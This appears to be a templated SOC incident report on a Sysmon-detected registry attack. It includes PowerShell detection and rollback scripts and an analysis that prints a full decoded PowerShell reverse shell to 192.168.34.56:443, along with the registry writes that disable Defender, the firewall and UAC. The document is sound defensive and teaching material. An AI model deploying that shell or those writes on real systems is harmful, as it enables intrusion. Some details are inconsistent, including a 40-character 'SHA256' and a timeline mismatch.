T1112 – Modify Registry (Sysmon Detection)

Sysmon Alert Details
Alert ID: SYSMON-REG-MOD-1112-7842
Alert Time: 2024-03-07 14:15:33 EST
Severity: HIGH (85/100)
Source: Sysmon (Event ID 13 – Registry Value Set)
Rule: "Suspicious Registry Modification – Run Key"
MITRE ATT&CK: T1112 – Modify Registry

Alert Details:

Detection: Multiple registry modifications for persistence and configuration changes

Host: ENG-WS-045 (Engineering Workstation)
User: alexchen@company.com (Alex Chen, Engineer)
Time: 14:00-14:15 EST

Registry Modifications (Event ID 13):

Persistence – Run Key:

Key: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Value: "WindowsUpdate"
Data: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -EncodedCommand JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACcAMQA5ADIALgAxADYAOAAuADMANAAuADUANgAnACwANAA0ADMAKQA7AA=="
Time: 14:05:22

Disable Security Tools:

Key: HKLM\SOFTWARE\Policies\Microsoft\Windows Defender
Value: "DisableAntiSpyware"
Data: 1 (DWORD; Defender antivirus disabled by policy)
Time: 14:06:45

Disable Firewall:

Key: HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile
Value: "EnableFirewall"
Data: 0 (DWORD; firewall disabled for the standard/private profile)
Time: 14:07:18

Disable UAC:

Key: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
Value: "EnableLUA"
Data: 0 (DWORD; UAC disabled, effective after the next reboot)
Time: 14:08:33

Add Exclusion for Malware Path:

Key: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
Value: "C:\Windows\Temp"
Data: 0 (DWORD; Defender names each exclusion entry after the excluded path)
Time: 14:09:45

Process Details:

Process: C:\Users\alexchen\Downloads\system_update.exe (PID: 4789)
SHA256: b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1
Parent: explorer.exe
User: alexchen

Detection Logic:

Multiple registry modifications in short time
Persistence via Run key (encoded PowerShell)
Security tools disabled (Defender, Firewall, UAC)
Exclusions added for malware paths
Pattern matches attacker securing environment
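The rule above, written out as code. This is an added example, not part of the original report and not Sysmon or Splunk content: it re-implements the detection logic over Sysmon Event ID 13 records, grouping writes by process, classifying each one, decoding the -EncodedCommand payload found in Run-key data, and alerting when a single process performs persistence and defense-evasion writes inside a short window. The function and variable names are the example's own; the sample events are constructed from the values in the alert, and Get-SysmonRegistryEvents is the swap-in for a live host. Sysmon only logs TargetObjects that its configuration includes, so every path matched here must be covered by a RegistryEvent rule before this can fire in production.

```powershell
# Added example (not from the report): the report's detection logic over Sysmon Event ID 13.
# Writes are grouped by process, classified, Run-key payloads are decoded, and an alert is
# raised when one process does persistence AND defense-evasion writes inside a short window.
# Sysmon only logs TargetObjects its config includes; every path below needs a RegistryEvent rule.

function Get-SysmonRegistryEvents {
    # Live source: Event ID 13 from the Sysmon channel, flattened to the shape used below.
    param([int]$Minutes = 15)
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 13
                                     StartTime = (Get-Date).AddMinutes(-$Minutes) } |
    ForEach-Object {
        $d = @{}
        foreach ($n in ([xml]$_.ToXml()).Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
        [pscustomobject]@{ Time = $_.TimeCreated; ProcessId = [int]$d.ProcessId; Image = $d.Image
                           TargetObject = $d.TargetObject; Details = $d.Details }
    }
}

function ConvertFrom-EncodedCommand {
    # Decode a powershell -EncodedCommand (also -e/-ec/-enc) argument: base64 of UTF-16LE text.
    param([string]$CommandLine)
    if ($CommandLine -match '-(?:encodedcommand|enc|ec|e)\s+"?([A-Za-z0-9+/=]+)') {
        return [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[1]))
    }
    return $null
}

function Get-DwordValue {
    # Sysmon renders DWORDs as "DWORD (0x00000001)"; accept that form or a bare integer.
    param([string]$Details)
    if ($Details -match '0x([0-9A-Fa-f]+)') { return [Convert]::ToInt64($Matches[1], 16) }
    if ($Details -match '^\d+$') { return [int64]$Details }
    return $null
}

function Get-RegistryWriteCategory {
    # Classify one write; $null means the rule does not care about this TargetObject/Details.
    param([string]$TargetObject, [string]$Details)
    $v = Get-DwordValue $Details
    switch -Regex ($TargetObject) {
        '\\CurrentVersion\\Run(Once)?\\'                               { return 'persistence' }
        '\\Policies\\Microsoft\\Windows Defender\\DisableAntiSpyware$' { if ($v -eq 1) { return 'disable-av' } }
        '\\FirewallPolicy\\\w+Profile\\EnableFirewall$'                { if ($v -eq 0) { return 'disable-firewall' } }
        '\\Policies\\System\\EnableLUA$'                               { if ($v -eq 0) { return 'disable-uac' } }
        '\\Windows Defender\\Exclusions\\(Paths|Processes|Extensions)\\' { return 'av-exclusion' }
    }
    return $null
}

function Test-RegistryAttackPattern {
    # One alert object per process that wrote persistence plus at least one defense-evasion
    # value within $WindowMinutes; an empty array means nothing matched.
    param([object[]]$Events, [int]$WindowMinutes = 10)
    $alerts = @()
    foreach ($group in ($Events | Group-Object ProcessId)) {
        $hits = @(foreach ($e in ($group.Group | Sort-Object Time)) {
            $cat = Get-RegistryWriteCategory -TargetObject $e.TargetObject -Details $e.Details
            if (-not $cat) { continue }
            $decoded = $null
            if ($cat -eq 'persistence') { $decoded = ConvertFrom-EncodedCommand $e.Details }
            [pscustomobject]@{ Time = $e.Time; Category = $cat; Target = $e.TargetObject; Decoded = $decoded }
        })
        if ($hits.Count -eq 0) { continue }
        $cats    = @($hits.Category | Sort-Object -Unique)
        $evasion = @($cats | Where-Object { $_ -ne 'persistence' })
        $span    = ($hits[-1].Time - $hits[0].Time).TotalMinutes
        if (('persistence' -in $cats) -and $evasion.Count -ge 1 -and $span -le $WindowMinutes) {
            $alerts += [pscustomobject]@{ ProcessId = $group.Name; Image = $group.Group[0].Image
                                          FirstWrite = $hits[0].Time; LastWrite = $hits[-1].Time
                                          Categories = ($cats -join ','); Hits = $hits }
        }
    }
    return ,$alerts
}

# Constructed sample reproducing the report's five writes by PID 4789 (not real telemetry).
# Replace with `$Sample = Get-SysmonRegistryEvents -Minutes 15` to run against a live host.
$enc = 'JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACcAMQA5ADIALgAxADYAOAAuADMANAAuADUANgAnACwANAA0ADMAKQA7AA=='
function New-SampleEvent($Time, $TargetObject, $Details) {
    [pscustomobject]@{ Time = [datetime]"2024-03-07 $Time"; ProcessId = 4789
                       Image = 'C:\Users\alexchen\Downloads\system_update.exe'
                       TargetObject = $TargetObject; Details = $Details }
}
$Sample = @(
    New-SampleEvent '14:05:22' 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate' "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -EncodedCommand $enc"
    New-SampleEvent '14:06:45' 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware' 'DWORD (0x00000001)'
    New-SampleEvent '14:07:18' 'HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall' 'DWORD (0x00000000)'
    New-SampleEvent '14:08:33' 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA' 'DWORD (0x00000000)'
    New-SampleEvent '14:09:45' 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp' 'DWORD (0x00000000)'
)

foreach ($a in Test-RegistryAttackPattern -Events $Sample -WindowMinutes 10) {
    "ALERT pid=$($a.ProcessId) image=$($a.Image) $($a.FirstWrite.ToString('HH:mm:ss'))-$($a.LastWrite.ToString('HH:mm:ss')) [$($a.Categories)]"
    $a.Hits | Where-Object Decoded | ForEach-Object { "  decoded Run payload: $($_.Decoded)" }
}
```

On the sample, the five writes land on one process 4 minutes 23 seconds apart, so one alert is produced carrying all five categories, and the decoded Run payload shows the TCPClient connection to 192.168.34.56:443 that the analyst would otherwise have to decode by hand. Grouping by ProcessId rather than by host is what keeps a legitimate Defender policy push and an unrelated installer's Run key from being correlated into a false positive.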
SOC Investigation Process

Step                      | Action                            | Tools Used           | Findings
1. Alert Validation       | Verify Sysmon events              | Splunk, Sysmon Logs  | Confirmed malicious registry modifications
2. Process Investigation  | Identify system_update.exe        | CrowdStrike Falcon   | Malicious tool downloaded from internet
3. Immediate Action       | Revert registry changes           | PowerShell, reg      | All registry keys restored to original values
4. Security Tools Restart | Re-enable Defender, Firewall, UAC | PowerShell           | Security services restarted
5. Process Termination    | Kill system_update.exe            | CrowdStrike          | Process terminated
6. Account Remediation    | Disable alexchen account          | Azure AD, AD         | Account disabled; password reset

Jira Incident Report
Ticket: SOC-2024-182
Summary: T1112 – Registry Modifications for Persistence and Defense Disablement
Status: RESOLVED
Resolution: MALICIOUS – Registry Restored
Priority: P2 – MEDIUM
Labels: T1112, modify-registry, persistence, defense-evasion, sysmon
Components: Endpoint-Security, Registry-Monitoring

INCIDENT ANALYSIS REPORT

1. Initial Context:

Detection Source: Sysmon Event ID 13 (Registry Value Set).
Alert: “Suspicious Registry Modification – Run Key”.
Host: ENG-WS-045 (Engineering, user alexchen).
Process: C:\Users\alexchen\Downloads\system_update.exe.
Time: 2024-03-07 14:15 EST.
Technique: MITRE ATT&CK T1112 – Modify Registry.

2. Technical Analysis:

Attack Chain:

13:30 – User downloads “system update tool” from pop-up ad
13:45 – Executes system_update.exe
13:50 – Malware begins registry modifications
14:00-14:15 – Multiple registry changes
14:15 – Sysmon detects

Registry Modifications:

Run Key Persistence: Encoded PowerShell reverse shell to 192.168.34.56:443, launched at every logon (an HKLM Run value fires for any user who logs on to the host)
Disable Defender: DisableAntiSpyware policy turns off Defender antivirus; on current Windows builds Defender ignores this value while Tamper Protection is on, so the write only succeeds where tamper protection is off
Disable Firewall: Turns off the host firewall for the standard (private) profile; this removes inbound filtering, although an outbound reverse shell to 443 would normally pass a default profile anyway
Disable UAC: EnableLUA=0 removes elevation prompts; the change takes effect after the next reboot, not immediately
Add Exclusion: Stops Defender scanning C:\Windows\Temp (the dropper itself ran from Downloads, so the exclusion covers a staging path rather than the original file)

Encoded PowerShell (decoded):

The -EncodedCommand argument is base64 of UTF-16LE text. The blob quoted in the alert decodes to only the first statement ($client = New-Object System.Net.Sockets.TCPClient('192.168.34.56',443);); the complete script is a standard one-line TCP reverse shell that reads commands from the C2, runs them with iex, and returns the output behind a fake "PS >" prompt:

$client = New-Object System.Net.Sockets.TCPClient('192.168.34.56',443);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
    $sendback = (iex $data 2>&1 | Out-String );
    $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
    $stream.Write($sendbyte,0,$sendbyte.Length);
    $stream.Flush()
};
$client.Close()

Impact:

Persistence established
Security defenses disabled
Malware could operate freely

3. Investigation Findings:

Timeline:

13:30 – Tool downloaded
13:45 – Executed
13:50-14:15 – Registry modifications
14:15 – Alert
14:17 – SOC investigates
14:18 – Registry restored
14:19 – Security tools re-enabled
14:20 – Process terminated

Indicators of Compromise (IoCs):

Files:

– C:\Users\alexchen\Downloads\system_update.exe (SHA256: b2c3d4e5…)

Registry Changes:

– HKLM\…\Run\WindowsUpdate (malicious)

– HKLM\…\Windows Defender\DisableAntiSpyware = 1

– HKLM\…\EnableFirewall = 0

– HKLM\…\EnableLUA = 0

– HKLM\…\Exclusions\Paths\C:\Windows\Temp

4. Containment Actions:

Immediate Actions:

Restored all registry keys to original values.
Re-enabled Windows Defender.
Re-enabled Windows Firewall.
Re-enabled UAC.
Removed exclusion for Temp folder.
Terminated system_update.exe.
Isolated host.
Disabled alexchen account.
Reset password.
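The registry rollback from the investigation table (steps 3 and 4) and the containment list above, as an added example; this is not the script the SOC used. It exports the tainted keys for the case file, reverts the five writes on the affected host, and returns the resulting state so each control can be confirmed. Run it elevated; -WhatIf dry-runs every change. The function names and the case folder path are the example's own assumptions. Caveats the report leaves implicit: the DisableAntiSpyware policy is ignored while Tamper Protection is on, EnableLUA=1 only takes effect after a reboot, and deleting the Run value does not stop a shell that is already running, so terminate and isolate first even though the report reverted the registry before step 5.

```powershell
# Added example; not the report's own script. Reverts the five writes described in the report
# on the affected host (run elevated; -WhatIf dry-runs) after exporting the keys as evidence.
# Assumed: function names and the $EvidenceDir case folder. Kill/isolate before running this,
# because a live process can simply rewrite the values.

$T1112Keys = @{
    Run            = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
    DefenderPolicy = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender'
    Firewall       = 'HKLM:\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile'
    UAC            = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
}

function Get-T1112State {
    # Snapshot of every value the malware touched plus the live Defender/firewall view.
    param([string]$RunValueName = 'WindowsUpdate')
    $k = $T1112Keys
    [pscustomobject]@{
        RunValuePresent    = $null -ne (Get-ItemProperty -Path $k.Run -Name $RunValueName -ErrorAction SilentlyContinue)
        DisableAntiSpyware = (Get-ItemProperty -Path $k.DefenderPolicy -Name DisableAntiSpyware -ErrorAction SilentlyContinue).DisableAntiSpyware
        EnableFirewall     = (Get-ItemProperty -Path $k.Firewall -Name EnableFirewall -ErrorAction SilentlyContinue).EnableFirewall
        EnableLUA          = (Get-ItemProperty -Path $k.UAC -Name EnableLUA -ErrorAction SilentlyContinue).EnableLUA
        FirewallProfiles   = (Get-NetFirewallProfile | ForEach-Object { "$($_.Name)=$($_.Enabled)" }) -join ' '
        RealtimeProtection = -not (Get-MpPreference).DisableRealtimeMonitoring
        Exclusions         = ((Get-MpPreference).ExclusionPath -join ';')
        TamperProtected    = (Get-MpComputerStatus).IsTamperProtected
    }
}

function Invoke-T1112Rollback {
    [CmdletBinding(SupportsShouldProcess)]
    param(
        [string]$RunValueName  = 'WindowsUpdate',                     # value name from the alert
        [string]$ExclusionPath = 'C:\Windows\Temp',                   # excluded path from the alert
        [string]$EvidenceDir   = "$env:SystemDrive\IR\SOC-2024-182"   # assumed case folder
    )
    $k = $T1112Keys
    # 1. Preserve evidence first (reg.exe wants the native HKLM\ form, not the HKLM: drive).
    if ($PSCmdlet.ShouldProcess($EvidenceDir, 'Export tainted keys')) {
        New-Item -ItemType Directory -Force -Path $EvidenceDir | Out-Null
        foreach ($path in $k.Values) {
            $native = $path -replace '^HKLM:\\', 'HKLM\'
            reg.exe export $native (Join-Path $EvidenceDir (($native -split '\\')[-1] + '.reg')) /y | Out-Null
        }
    }
    # 2. Persistence: delete the malicious Run value. -WhatIf flows into the *-ItemProperty calls.
    Remove-ItemProperty -Path $k.Run -Name $RunValueName -ErrorAction SilentlyContinue
    # 3. Defender: an absent policy value means "not disabled", so remove it rather than set 0,
    #    then turn real-time protection back on through Defender's own cmdlet.
    Remove-ItemProperty -Path $k.DefenderPolicy -Name DisableAntiSpyware -ErrorAction SilentlyContinue
    if ($PSCmdlet.ShouldProcess('Windows Defender', 'Enable real-time monitoring')) {
        Set-MpPreference -DisableRealtimeMonitoring $false
    }
    # 4. Firewall: fix the raw policy value and re-enable every profile via the supported API.
    Set-ItemProperty -Path $k.Firewall -Name EnableFirewall -Value 1 -Type DWord
    Set-NetFirewallProfile -Profile Domain, Private, Public -Enabled True
    # 5. UAC: effective after the next reboot (the report reimaged the host anyway).
    Set-ItemProperty -Path $k.UAC -Name EnableLUA -Value 1 -Type DWord
    # 6. Exclusion: the Exclusions key is protected, so go through Defender rather than the registry.
    if ($PSCmdlet.ShouldProcess('Windows Defender', "Remove exclusion $ExclusionPath")) {
        Remove-MpPreference -ExclusionPath $ExclusionPath
    }
    Get-T1112State -RunValueName $RunValueName
}

# Dry run first; then run without -WhatIf. A clean host reports RunValuePresent=False,
# DisableAntiSpyware empty, EnableFirewall=1, EnableLUA=1, every profile True and no Temp exclusion.
Invoke-T1112Rollback -WhatIf
# Invoke-T1112Rollback | Format-List
```

Get-T1112State is deliberately separate so the same check can be run on the reimaged host and on any other machine the dropper's hash turns up on, and the TamperProtected field tells the analyst whether the DisableAntiSpyware write could ever have taken effect on that host.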

Host Remediation:

Full scan (clean).
Reimaged as precaution.

5. Root Cause Analysis:

Primary Cause: User downloaded and executed fake update tool.
Contributing Factors:
No application control.
User had local admin rights.

6. Business Impact:

Operational Impact: Engineering workstation offline for 2 hours.
Data Exposure: None (C2 not yet active).

7. Remediation & Prevention:

Completed Actions:

Registry restored.
Security tools re-enabled.
Malware removed.

Technical Controls Enhanced:

Created alert for registry modifications to Run keys.
Enhanced monitoring for security tool disablement.
Implemented application control.

8. Conclusion:

An attacker used a fake update tool to modify registry keys for persistence and disable security defenses. Sysmon detected the registry changes, enabling rapid restoration before C2 communication.

Closure Rationale: Registry restored; security tools re-enabled; malware removed.

Analyst: [Your Name], SOC Analyst Date: 2024-03-07 15:30 EST
